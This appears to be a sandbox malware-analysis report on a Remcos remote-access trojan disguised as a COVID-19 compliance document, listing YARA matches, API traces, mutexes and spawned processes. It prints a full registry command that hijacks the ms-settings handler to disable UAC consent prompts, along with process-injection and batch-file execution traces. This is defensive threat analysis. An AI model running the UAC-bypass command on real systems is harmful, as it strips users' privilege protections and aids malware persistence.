              Source: 23.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
              Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 23.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
              Source: 23.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
              Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
              Source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
              Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D2A6
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D2A612_2_0040D2A6
              Source: C:\Windows\SysWOW64\notepad.exeCode function: String function: 50484224 appears 50 times
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 00413E72 appears 49 times
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 0041203B appears 31 times
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exeStatic PE information: invalid certificate
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: Xbuhnek.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f
              Source: 00000014.00000002.420518923.0000000010540000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000017.00000002.435351745.0000000010540000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000C.00000002.494954469.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 0000000C.00000002.494954469.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000017.00000002.433986384.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 00000017.00000002.433986384.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000C.00000002.498610658.0000000010540000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000014.00000002.413656142.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 00000014.00000002.413656142.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: C:\Users\user\AppData\Local\hubX.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Users\user\AppData\Local\hubX.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: C:\Users\user\AppData\Local\hubX.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
              Source: 23.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 23.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 23.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 23.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 23.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 23.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 20.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
              Source: 12.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/9@6/7
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_0040EC0F
              Source: C:\Windows\SysWOW64\notepad.exeCode function: 6_2_5048784E GetDiskFreeSpaceA,6_2_5048784E
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00409A2F GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00409A2F
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource,12_2_00409D02
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00411927
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Xbuhvsl[1]Jump to behavior
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMutant created: \Sessions\1\BaseNamedObjects\winon-9DYKLX
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_01
              Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Windows\SysWOW64\notepad.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exeReversingLabs: Detection: 10%
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exeFile read: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe 'C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exe'
              Source: unknownProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
              Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
              Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\SOFTWARE\Classes\ms-settings\shell\open\command' /t REG_SZ /d 'C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f' /f
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe'
              Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\Xbuhnek.exe'
              Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
              Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\System32\Notepad.exeJump to behavior
              Source: C:\Users\user\Desktop\Customer Report on COVID-19 Non-Complaince. Doc.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exeJump to behavior
              Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.batJump to behavior
              Source: C:\Windows\SysWOW64\notepad.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.batJump to behavior
